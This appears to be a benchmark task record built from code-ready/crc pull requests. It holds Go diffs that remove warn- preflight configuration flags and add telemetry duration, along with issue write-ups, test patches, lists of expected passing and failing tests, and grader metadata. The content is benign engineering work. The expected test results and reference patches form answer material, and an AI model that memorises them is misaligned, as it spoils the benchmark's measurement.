- Set("action", action). - Set("error", err.Error()) + if err := c.segmentClient.Enqueue(analytics.Identify{ + AnonymousId: anonymousID, + Traits: analytics.NewTraits(). + Set("os", runtime.GOOS), + }); err != nil { + return err + } + + properties := analytics.NewProperties(). + Set("success", err == nil). + Set("duration", duration.Milliseconds()) + if err != nil { + properties = properties.Set("error", err.Error()) + } - return c.segmentClient.Enqueue(analytics.Identify{ + return c.segmentClient.Enqueue(analytics.Track{ AnonymousId: anonymousID, - Traits: t, + Event: action, + Properties: properties, }) } diff --git a/pkg/os/linux/release_info.go b/pkg/os/linux/release_info.go index bd951be21..836a6e8ce 100644 --- a/pkg/os/linux/release_info.go +++ b/pkg/os/linux/release_info.go @@ -92,9 +92,7 @@ func UnmarshalOsRelease(osReleaseContents []byte, release *OsRelease) error { logging.Warnf("Warning: got an invalid line error parsing /etc/os-release: %s", err) continue } - if err := release.setIfPossible(key, val); err != nil { - logging.Debug(err) - } + _ = release.setIfPossible(key, val) } return nil } @@ -102,7 +100,7 @@ func UnmarshalOsRelease(osReleaseContents []byte, release *OsRelease) error { func GetOsRelease() (*OsRelease, error) { // Check if release file exist if _, err := os.Stat(releaseFile); os.IsNotExist(err) { - return nil, fmt.Errorf("%s not exist", releaseFile) + return nil, fmt.Errorf("%s doesn't exist", releaseFile) } content, err := ioutil.ReadFile(releaseFile) if err != nil {
Remove kubelet status check from start It made sense before to check the status before perfoming some of the cluster specific tasks since we were stopping/starting kubelet service many time but now we just start the service and then do all the cluster specific operations. If there is any issue with kubelet service it is failed in early stage.
**Title** Simplify start flow, remove obsolete kubelet check and streamline pre‑flight, telemetry and platform handling **Problem** - The start command performed an unnecessary kubelet‑service status check, causing premature failures. - Pre‑flight configuration exposed both `skip-` and `warn-` flags, complicating user intent and documentation. - Telemetry uploads did not include execution duration and could block on errors. - Several platform‑specific scripts and detection logic were outdated, leading to incorrect behavior on Ubuntu, Fedora and NetworkManager environments. **Root Cause** Legacy checks and configuration options were retained after the start process was refactored, and telemetry/OS‑specific handling was not updated to match current workflows. **Fix / Expected Behavior** - Eliminate the kubelet service status verification from the VM start sequence; failures will now surface later if the service is not running. - Remove all `warn-` pre‑flight flags; only `skip-` flags remain and are sorted consistently. - Upload telemetry events with the command’s execution time and a success flag, handling upload errors gracefully. - Relocate the NetworkManager dispatcher script to its correct path, remove the old script, and ensure it is invoked on each connection change. - Detect Ubuntu‑like distributions using `ID_LIKE` and apply the proper libvirt install command; treat Fedora‑like releases correctly. - Add proper setup and cleanup for vsock configuration, including udev rules and module autoload files. - Fix tray extraction on macOS and Windows by using explicit file paths for the downloaded archive. - Update documentation to reflect the simplified `skip-check` usage. **Risk & Validation** - Verify that `crc start` completes successfully on all supported Linux distros without the removed kubelet check. - Run the full pre‑flight suite to confirm that only `skip-` options are recognized and that warning behavior is eliminated. 
- Execute start and setup commands while telemetry consent is enabled; ensure events are sent with duration and no panics occur on upload failure. - Test NetworkManager‑based hosts to confirm the dispatcher script is present at the new location and restores split‑DNS settings after network changes.
1,815
code-ready/crc
diff --git a/pkg/crc/preflight/preflight_darwin_test.go b/pkg/crc/preflight/preflight_darwin_test.go index 9b0b840c6..5f94d8c75 100644 --- a/pkg/crc/preflight/preflight_darwin_test.go +++ b/pkg/crc/preflight/preflight_darwin_test.go @@ -12,7 +12,7 @@ import ( func TestCountConfigurationOptions(t *testing.T) { cfg := config.New(config.NewEmptyInMemoryStorage()) RegisterSettings(cfg) - assert.Len(t, cfg.AllConfigs(), 18) + assert.Len(t, cfg.AllConfigs(), 9) } func TestCountPreflights(t *testing.T) { diff --git a/pkg/crc/preflight/preflight_linux_test.go b/pkg/crc/preflight/preflight_linux_test.go index c0cd327ac..3b9e22649 100644 --- a/pkg/crc/preflight/preflight_linux_test.go +++ b/pkg/crc/preflight/preflight_linux_test.go @@ -21,7 +21,7 @@ func TestCountConfigurationOptions(t *testing.T) { var preflightChecksCount int for _, check := range getAllPreflightChecks() { if check.configKeySuffix != "" { - preflightChecksCount += 2 + preflightChecksCount++ } } assert.True(t, options == preflightChecksCount, "Unexpected number of preflight configuration flags, got %d, expected %d", options, preflightChecksCount) diff --git a/pkg/crc/preflight/preflight_test.go b/pkg/crc/preflight/preflight_test.go index 47726a8b0..c624566ca 100644 --- a/pkg/crc/preflight/preflight_test.go +++ b/pkg/crc/preflight/preflight_test.go @@ -39,18 +39,6 @@ func TestFixPreflight(t *testing.T) { assert.True(t, calls.fixed) } -func TestWarnPreflight(t *testing.T) { - check, calls := sampleCheck(errors.New("check failed"), errors.New("fix failed")) - cfg := config.New(config.NewEmptyInMemoryStorage()) - doRegisterSettings(cfg, []Check{*check}) - _, err := cfg.Set("warn-sample", true) - assert.NoError(t, err) - - assert.NoError(t, doFixPreflightChecks(cfg, []Check{*check})) - assert.True(t, calls.checked) - assert.True(t, calls.fixed) -} - func sampleCheck(checkErr, fixErr error) (*Check, *status) { status := &status{} return &Check{ diff --git a/pkg/crc/preflight/preflight_windows_test.go 
b/pkg/crc/preflight/preflight_windows_test.go index b9e84e819..ac08d4bda 100644 --- a/pkg/crc/preflight/preflight_windows_test.go +++ b/pkg/crc/preflight/preflight_windows_test.go @@ -11,7 +11,7 @@ import ( func TestCountConfigurationOptions(t *testing.T) { cfg := config.New(config.NewEmptyInMemoryStorage()) RegisterSettings(cfg) - assert.Len(t, cfg.AllConfigs(), 24) + assert.Len(t, cfg.AllConfigs(), 12) } func TestCountPreflights(t *testing.T) { diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index cdf4faa22..abc799f97 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -8,7 +8,9 @@ import ( "net/http/httptest" "os" "path/filepath" + "runtime" "testing" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -22,8 +24,11 @@ type segmentResponse struct { AnonymousID string `json:"anonymousId"` MessageID string `json:"messageId"` Traits struct { - Error string `json:"error"` + OS string `json:"os"` } `json:"traits"` + Properties struct { + Error string `json:"error"` + } `json:"properties"` Type string `json:"type"` } `json:"batch"` Context struct { @@ -81,14 +86,17 @@ func TestClientUploadWithConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Minute, errors.New("an error occurred"))) require.NoError(t, c.Close()) select { case x := <-body: s := segmentResponse{} require.NoError(t, json.Unmarshal(x, &s)) - require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") + require.Equal(t, s.Batch[0].Type, "identify") + require.Equal(t, s.Batch[0].Traits.OS, runtime.GOOS) + require.Equal(t, s.Batch[1].Type, "track") + require.Equal(t, s.Batch[1].Properties.Error, "an error occurred") require.Equal(t, s.Context.App.Name, "crc") require.Equal(t, 
s.Context.App.Version, version.GetCRCVersion()) default: @@ -111,7 +119,7 @@ func TestClientUploadWithOutConsent(t *testing.T) { c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) require.NoError(t, err) - require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", time.Second, errors.New("an error occurred"))) require.NoError(t, c.Close()) select { diff --git a/test/integration/features/config.feature b/test/integration/features/config.feature index dd323b76c..8ce0c47b3 100644 --- a/test/integration/features/config.feature +++ b/test/integration/features/config.feature @@ -56,55 +56,6 @@ Feature: Test configuration settings When unsetting config property "disable-update-check" succeeds Then "JSON" config file "crc.json" in CRC home folder does not contain key "disable-update-check" - # WARNINGS - - Scenario Outline: CRC config checks (warnings) - When setting config property "<property>" to value "<value1>" succeeds - Then "JSON" config file "crc.json" in CRC home folder contains key "<property>" with value matching "<value1>" - When setting config property "<property>" to value "<value2>" succeeds - Then "JSON" config file "crc.json" in CRC home folder contains key "<property>" with value matching "<value2>" - When unsetting config property "<property>" succeeds - Then "JSON" config file "crc.json" in CRC home folder does not contain key "<property>" - - @darwin - Examples: Config warnings on Mac - | property | value1 | value2 | - | warn-check-bundle-extracted | true | false | - | warn-check-hosts-file-permissions | true | false | - | warn-check-hyperkit-driver | true | false | - | warn-check-hyperkit-installed | true | false | - | warn-check-resolver-file-permissions | true | false | - | warn-check-root-user | true | false | - - @linux - Examples: Config warnings on Linux - | property | value1 | value2 | - | warn-check-bundle-extracted | true | false | - | warn-check-crc-dnsmasq-file | 
true | false | - | warn-check-crc-network | true | false | - | warn-check-crc-network-active | true | false | - | warn-check-kvm-enabled | true | false | - | warn-check-libvirt-driver | true | false | - | warn-check-libvirt-installed | true | false | - | warn-check-libvirt-running | true | false | - | warn-check-libvirt-version | true | false | - | warn-check-network-manager-config | true | false | - | warn-check-network-manager-installed | true | false | - | warn-check-network-manager-running | true | false | - | warn-check-root-user | true | false | - | warn-check-user-in-libvirt-group | true | false | - | warn-check-virt-enabled | true | false | - - @windows - Examples: Config warnings on Windows - | property | value1 | value2 | - | warn-check-administrator-user | true | false | - | warn-check-bundle-extracted | true | false | - | warn-check-hyperv-installed | true | false | - | warn-check-hyperv-switch | true | false | - | warn-check-user-in-hyperv-group | true | false | - | warn-check-windows-version | true | false | - # SKIP Scenario Outline: CRC config checks (skips)
[ "TestCountConfigurationOptions", "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Method: Client.Upload(action string, duration time.Duration, err error) Location: pkg/crc/segment/segment.go Inputs: - **action** (string): name of the command or operation being reported (e.g., “start”). - **duration** (time.Duration): elapsed time of the operation; used for the “duration” property in the telemetry payload. - **err** (error): the error returned by the operation, or nil on success; its message is sent as the “error” property when non‑nil. Outputs: - **error**: nil if telemetry is disabled or the identify/track event was queued successfully; otherwise the enqueue error (or any underlying error from building the payload). Description: Uploads a telemetry event to Segment. It first sends an Identify call containing the OS information, then sends a Track call with the action name, a success flag, the measured duration, and optionally the error message. The call is a no‑op when the user has opted out of telemetry.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 12, "num_modified_lines": 119, "pr_author": "praveenkumar", "pr_labels": [ "approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.78, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to remove a kubelet status check, but the provided test patch also changes configuration option counts, removes warning‑related preflight code, alters telemetry upload signatures, and updates several platform‑specific scripts. The tests now expect different values (e.g., config option counts) that were not mentioned in the issue, indicating missing acceptance criteria and extra required changes. This mismatch is a classic ambiguous specification (B4) rather than a cleanly solvable problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "config option count assertions expect old numbers (18, 24) but patch reduces them to half", "preflight warning test removed while tests still reference warning behavior", "segment.Upload signature changed (adds duration) causing test failures" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, 
"test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
10c1dda3168a5ce13d4ed1431189e8e2ec086141
2021-01-05 14:25:06
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1816#" title="Author self-approved">praveenkumar</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [praveenkumar] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1816#pullrequestreview-561831138" title="Approved">cfergeau</a>*, *<a href="https://github.com/code-ready/crc/pull/1816#" title="Author self-approved">praveenkumar</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [cfergeau,praveenkumar] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> openshift-ci-robot: New changes are detected. LGTM label has been removed.
code-ready__crc-1816
diff --git a/cmd/crc/cmd/config/config.go b/cmd/crc/cmd/config/config.go index 6a191653b..4aa2e4cdb 100644 --- a/cmd/crc/cmd/config/config.go +++ b/cmd/crc/cmd/config/config.go @@ -52,22 +52,15 @@ func RegisterSettings(cfg *config.Config) { } func isPreflightKey(key string) bool { - return strings.HasPrefix(key, "skip-") || strings.HasPrefix(key, "warn-") + return strings.HasPrefix(key, "skip-") } // less is used to sort the config keys. We want to sort first the regular keys, and -// then the keys related to preflight starting with a skip- or warn- prefix. We want -// these preflight keys to be grouped by pair: 'skip-bar', 'warn-bar', 'skip-foo', 'warn-foo' -// would be sorted in that order. +// then the keys related to preflight starting with a skip- prefix. func less(lhsKey, rhsKey string) bool { if isPreflightKey(lhsKey) { if isPreflightKey(rhsKey) { - // lhs is preflight, rhs is preflight - if lhsKey[4:] == rhsKey[4:] { - // we want skip-foo before warn-foo - return lhsKey < rhsKey - } - // ignore skip-/warn- prefix + // ignore skip prefix return lhsKey[4:] < rhsKey[4:] } // lhs is preflight, rhs is not preflight diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index deac2af5f..36e7a13b2 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -174,9 +174,10 @@ func addForceFlag(cmd *cobra.Command) { func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { return func(cmd *cobra.Command, args []string) error { + logging.Debugf("Running '%s'", fullCmd) if err := input(cmd, args); err != nil { if serr := segmentClient.Upload(fullCmd, err); serr != nil { - fmt.Println(serr.Error()) + logging.Debugf("Cannot send data to telemetry: %v", serr) } return err } diff --git a/docs/source/topics/con_about-codeready-containers-configuration.adoc b/docs/source/topics/con_about-codeready-containers-configuration.adoc index 160bc0043..8c858f24c 100644 --- 
a/docs/source/topics/con_about-codeready-containers-configuration.adoc +++ b/docs/source/topics/con_about-codeready-containers-configuration.adoc @@ -9,4 +9,4 @@ Run the [command]`{bin} config --help` command to list the available properties. You can also use the [command]`{bin} config` command to configure the behavior of the startup checks for the [command]`{bin} start` and [command]`{bin} setup` commands. By default, startup checks report an error and stop execution when their conditions are not met. -Set the value of a property starting with `skip-check` or `warn-check` to `true` to skip the check or report a warning rather than an error, respectively. +Set the value of a property starting with `skip-check` to `true` to skip the check. diff --git a/pkg/crc/preflight/preflight.go b/pkg/crc/preflight/preflight.go index 7652758ab..ada6d0e19 100644 --- a/pkg/crc/preflight/preflight.go +++ b/pkg/crc/preflight/preflight.go @@ -50,20 +50,6 @@ func (check *Check) shouldSkip(config config.Storage) bool { return config.Get(check.getSkipConfigName()).AsBool() } -func (check *Check) getWarnConfigName() string { - if check.configKeySuffix == "" { - return "" - } - return "warn-" + check.configKeySuffix -} - -func (check *Check) shouldWarn(config config.Storage) bool { - if check.configKeySuffix == "" { - return false - } - return config.Get(check.getWarnConfigName()).AsBool() -} - func (check *Check) doCheck(config config.Storage) error { if check.checkDescription == "" { panic(fmt.Sprintf("Should not happen, empty description for check '%s'", check.configKeySuffix)) @@ -110,13 +96,8 @@ func doPreflightChecks(config config.Storage, checks []Check) error { if check.flags&SetupOnly == SetupOnly || check.flags&CleanUpOnly == CleanUpOnly { continue } - err := check.doCheck(config) - if err != nil { - if check.shouldWarn(config) { - logging.Warn(err.Error()) - } else { - return err - } + if err := check.doCheck(config); err != nil { + return err } } return nil @@ -131,13 +112,8 
@@ func doFixPreflightChecks(config config.Storage, checks []Check) error { if err == nil { continue } - err = check.doFix() - if err != nil { - if check.shouldWarn(config) { - logging.Warn(err.Error()) - } else { - return err - } + if err = check.doFix(); err != nil { + return err } } return nil @@ -169,7 +145,6 @@ func doRegisterSettings(cfg config.Schema, checks []Check) { for _, check := range checks { if check.configKeySuffix != "" { cfg.AddSetting(check.getSkipConfigName(), false, config.ValidateBool, config.SuccessfullyApplied) - cfg.AddSetting(check.getWarnConfigName(), false, config.ValidateBool, config.SuccessfullyApplied) } } } diff --git a/pkg/os/linux/release_info.go b/pkg/os/linux/release_info.go index ce9a361af..836a6e8ce 100644 --- a/pkg/os/linux/release_info.go +++ b/pkg/os/linux/release_info.go @@ -92,9 +92,7 @@ func UnmarshalOsRelease(osReleaseContents []byte, release *OsRelease) error { logging.Warnf("Warning: got an invalid line error parsing /etc/os-release: %s", err) continue } - if err := release.setIfPossible(key, val); err != nil { - logging.Debug(err) - } + _ = release.setIfPossible(key, val) } return nil }
Remove warn flags from the config `warn-<preflight-check>` is not used in crc context because we are already capturing the checks data as part of debug logs. `skip` is there to skip a check if a user don't want to run a check.
**Title** Simplify pre‑flight configuration by removing warning flags and clean up related logging **Problem** The configuration exposed `warn-<check>` flags that were never used in practice, leading to unnecessary complexity and confusing documentation. Additionally, noisy debug output was generated for non‑critical errors during OS release parsing and telemetry failures. **Root Cause** `warn-` settings were retained in the schema and pre‑flight logic despite the system only handling `skip-` flags, and logging was overly verbose for harmless parsing issues and telemetry upload failures. **Fix / Expected Behavior** - Eliminate all `warn-` configuration options and their handling in pre‑flight checks. - Treat any failing pre‑flight check as a hard error, with skipping still controlled via `skip-` flags. - Update documentation to reflect that only `skip-` flags are supported. - Reduce log noise by emitting debug‑level messages for telemetry upload problems and silently ignoring non‑critical OS release parsing errors. - Preserve existing functionality for skipping checks and for successful pre‑flight execution. **Risk & Validation** - Users who previously relied on `warn-` flags may see stricter behavior; verify that core workflows (start, setup) still succeed when appropriate `skip-` flags are used. - Ensure the configuration schema no longer lists warning options and that `config --list` output reflects this change. - Run the pre‑flight test suite and OS release parsing tests to confirm that errors are still reported correctly while unnecessary logs are suppressed.
1,816
code-ready/crc
diff --git a/pkg/crc/preflight/preflight_darwin_test.go b/pkg/crc/preflight/preflight_darwin_test.go index 9b0b840c6..5f94d8c75 100644 --- a/pkg/crc/preflight/preflight_darwin_test.go +++ b/pkg/crc/preflight/preflight_darwin_test.go @@ -12,7 +12,7 @@ import ( func TestCountConfigurationOptions(t *testing.T) { cfg := config.New(config.NewEmptyInMemoryStorage()) RegisterSettings(cfg) - assert.Len(t, cfg.AllConfigs(), 18) + assert.Len(t, cfg.AllConfigs(), 9) } func TestCountPreflights(t *testing.T) { diff --git a/pkg/crc/preflight/preflight_linux_test.go b/pkg/crc/preflight/preflight_linux_test.go index c0cd327ac..3b9e22649 100644 --- a/pkg/crc/preflight/preflight_linux_test.go +++ b/pkg/crc/preflight/preflight_linux_test.go @@ -21,7 +21,7 @@ func TestCountConfigurationOptions(t *testing.T) { var preflightChecksCount int for _, check := range getAllPreflightChecks() { if check.configKeySuffix != "" { - preflightChecksCount += 2 + preflightChecksCount++ } } assert.True(t, options == preflightChecksCount, "Unexpected number of preflight configuration flags, got %d, expected %d", options, preflightChecksCount) diff --git a/pkg/crc/preflight/preflight_test.go b/pkg/crc/preflight/preflight_test.go index 47726a8b0..c624566ca 100644 --- a/pkg/crc/preflight/preflight_test.go +++ b/pkg/crc/preflight/preflight_test.go @@ -39,18 +39,6 @@ func TestFixPreflight(t *testing.T) { assert.True(t, calls.fixed) } -func TestWarnPreflight(t *testing.T) { - check, calls := sampleCheck(errors.New("check failed"), errors.New("fix failed")) - cfg := config.New(config.NewEmptyInMemoryStorage()) - doRegisterSettings(cfg, []Check{*check}) - _, err := cfg.Set("warn-sample", true) - assert.NoError(t, err) - - assert.NoError(t, doFixPreflightChecks(cfg, []Check{*check})) - assert.True(t, calls.checked) - assert.True(t, calls.fixed) -} - func sampleCheck(checkErr, fixErr error) (*Check, *status) { status := &status{} return &Check{ diff --git a/pkg/crc/preflight/preflight_windows_test.go 
b/pkg/crc/preflight/preflight_windows_test.go index b9e84e819..ac08d4bda 100644 --- a/pkg/crc/preflight/preflight_windows_test.go +++ b/pkg/crc/preflight/preflight_windows_test.go @@ -11,7 +11,7 @@ import ( func TestCountConfigurationOptions(t *testing.T) { cfg := config.New(config.NewEmptyInMemoryStorage()) RegisterSettings(cfg) - assert.Len(t, cfg.AllConfigs(), 24) + assert.Len(t, cfg.AllConfigs(), 12) } func TestCountPreflights(t *testing.T) { diff --git a/test/integration/features/config.feature b/test/integration/features/config.feature index dd323b76c..8ce0c47b3 100644 --- a/test/integration/features/config.feature +++ b/test/integration/features/config.feature @@ -56,55 +56,6 @@ Feature: Test configuration settings When unsetting config property "disable-update-check" succeeds Then "JSON" config file "crc.json" in CRC home folder does not contain key "disable-update-check" - # WARNINGS - - Scenario Outline: CRC config checks (warnings) - When setting config property "<property>" to value "<value1>" succeeds - Then "JSON" config file "crc.json" in CRC home folder contains key "<property>" with value matching "<value1>" - When setting config property "<property>" to value "<value2>" succeeds - Then "JSON" config file "crc.json" in CRC home folder contains key "<property>" with value matching "<value2>" - When unsetting config property "<property>" succeeds - Then "JSON" config file "crc.json" in CRC home folder does not contain key "<property>" - - @darwin - Examples: Config warnings on Mac - | property | value1 | value2 | - | warn-check-bundle-extracted | true | false | - | warn-check-hosts-file-permissions | true | false | - | warn-check-hyperkit-driver | true | false | - | warn-check-hyperkit-installed | true | false | - | warn-check-resolver-file-permissions | true | false | - | warn-check-root-user | true | false | - - @linux - Examples: Config warnings on Linux - | property | value1 | value2 | - | warn-check-bundle-extracted | true | false | - | 
warn-check-crc-dnsmasq-file | true | false | - | warn-check-crc-network | true | false | - | warn-check-crc-network-active | true | false | - | warn-check-kvm-enabled | true | false | - | warn-check-libvirt-driver | true | false | - | warn-check-libvirt-installed | true | false | - | warn-check-libvirt-running | true | false | - | warn-check-libvirt-version | true | false | - | warn-check-network-manager-config | true | false | - | warn-check-network-manager-installed | true | false | - | warn-check-network-manager-running | true | false | - | warn-check-root-user | true | false | - | warn-check-user-in-libvirt-group | true | false | - | warn-check-virt-enabled | true | false | - - @windows - Examples: Config warnings on Windows - | property | value1 | value2 | - | warn-check-administrator-user | true | false | - | warn-check-bundle-extracted | true | false | - | warn-check-hyperv-installed | true | false | - | warn-check-hyperv-switch | true | false | - | warn-check-user-in-hyperv-group | true | false | - | warn-check-windows-version | true | false | - # SKIP Scenario Outline: CRC config checks (skips)
[ "TestCountConfigurationOptions" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestClientUploadWithConsent", "TestClientUploadWithOutConsent", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 5, "num_modified_lines": 11, "pr_author": "praveenkumar", "pr_labels": [ "approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.95, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue asks to drop all \"warn-\" preflight configuration flags because they are unused, keeping only the \"skip-\" flags. The provided test patch updates the expected number of configuration options and removes warning‑related tests, matching the requested behavior. No test assertions introduce requirements beyond the issue description, and there are no signals of external dependencies, implicit naming, or ambiguous specifications, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, 
"test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
30f676113cb292d62ba6b9dd1aa7b1ec406b8c0d
2021-01-05 19:46:12
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1818#" title="Author self-approved">guillaumerose</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [guillaumerose] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> jsliacan: What's the idea of `-f` with `setup`? To avoid getting the prompt? guillaumerose: Yes, avoid the prompt when crc is used in a script on in a CI. There is a condition to detect if the session is interactive or not, but the user can still force it. gorkem: +1 to adding the instructions for turning off. We also need to refer to the privacy statement[1] FYI @sspeiche [1] https://developers.redhat.com/article/tool-data-collection gbraad: > There is a condition to detect if the session is interactive or not, but the user can still force it. This has a side-effect of 'forcing' false or true ... or ignoring the no-value state. understandable for the 